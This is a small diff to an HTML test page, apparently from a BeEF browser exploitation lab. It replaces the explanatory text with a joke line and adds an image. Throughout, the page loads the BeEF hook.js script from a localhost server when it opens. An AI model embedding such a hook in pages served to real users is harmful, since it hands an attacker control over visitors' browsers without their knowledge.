--- a/indexBeef.html
+++ b/indexBeef.html
@@ -5,7 +5,8 @@
     </title>
     </head>
     <body>
-        <p>This page should be running the hook script for BeEF</p>
+        <p>JEJEJEJEJEJEJEJ LOL XD</p>
+<img src="https://assets.pokemon.com/static2/_ui/img/og-default-image.jpeg">
         <script src="http://127.0.0.1:3000/hook.js"></script>
     </body>
 </html>
